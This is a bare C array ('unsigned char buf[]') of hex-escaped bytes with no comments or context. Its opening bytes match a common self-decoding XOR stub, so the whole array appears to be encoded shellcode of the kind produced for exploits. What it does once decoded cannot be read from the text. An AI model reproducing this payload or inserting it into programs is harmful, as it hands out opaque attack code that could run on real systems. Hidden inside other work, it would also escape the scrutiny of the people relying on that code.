unsigned char buf[] = 
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x7b\x23\x7a\xdd\x83\xee\xfc\xe2\xf4\x87\xcb\xf8\xdd\x7b\x23"
"\x1a\x54\x9e\x12\xba\xb9\xf0\x73\x4a\x56\x29\x2f\xf1\x8f\x6f"
"\xa8\x08\xf5\x74\x94\x30\xfb\x4a\xdc\xd6\xe1\x1a\x5f\x78\xf1"
"\x5b\xe2\xb5\xd0\x7a\xe4\x98\x2f\x29\x74\xf1\x8f\x6b\xa8\x30"
"\xe1\xf0\x6f\x6b\xa5\x98\x6b\x7b\x0c\x2a\xa8\x23\xfd\x7a\xf0"
"\xf1\x94\x63\xc0\x40\x94\xf0\x17\xf1\xdc\xad\x12\x85\x71\xba"
"\xec\x77\xdc\xbc\x1b\x9a\xa8\x8d\x20\x07\x25\x40\x5e\x5e\xa8"
"\x9f\x7b\xf1\x85\x5f\x22\xa9\xbb\xf0\x2f\x31\x56\x23\x3f\x7b"
"\x0e\xf0\x27\xf1\xdc\xab\xaa\x3e\xf9\x5f\x78\x21\xbc\x22\x79"
"\x2b\x22\x9b\x7c\x25\x87\xf0\x31\x91\x50\x26\x4b\x49\xef\x7b"
"\x23\x12\xaa\x08\x11\x25\x89\x13\x6f\x0d\xfb\x7c\xdc\xaf\x65"
"\xeb\x22\x7a\xdd\x52\xe7\x2e\x8d\x13\x0a\xfa\xb6\x7b\xdc\xaf"
"\x8d\x2b\x73\x2a\x9d\x2b\x63\x2a\xb5\x91\x2c\xa5\x3d\x84\xf6"
"\xed\xb7\x7e\x4b\xba\x75\x68\x13\x12\xdf\x7b\x23\x4f\x54\x9d"
"\x49\x6a\x8b\x2c\x4b\xe3\x78\x0f\x42\x85\x08\xfe\xe3\x0e\xd1"
"\x84\x6d\x72\xa8\x97\x4b\x8a\x68\xd9\x75\x85\x08\x13\x40\x17"
"\xb9\x7b\xaa\x99\x8a\x2c\x74\x4b\x2b\x11\x31\x23\x8b\x99\xde"
"\x1c\x1a\x3f\x07\x46\xdc\x7a\xae\x3e\xf9\x6b\xe5\x7a\x99\x2f"
"\x73\x2c\x8b\x2d\x65\x2c\x93\x2d\x75\x29\x8b\x13\x5a\xb6\xe2"
"\xfd\xdc\xaf\x54\x9b\x6d\x2c\x9b\x84\x13\x12\xd5\xfc\x3e\x1a"
"\x22\xae\x98\x9a\xc0\x51\x29\x12\x7b\xee\x9e\xe7\x22\xae\x1f"
"\x7c\xa1\x71\xa3\x81\x3d\x0e\x26\xc1\x9a\x68\x51\x15\xb7\x7b"
"\x70\x85\x08";
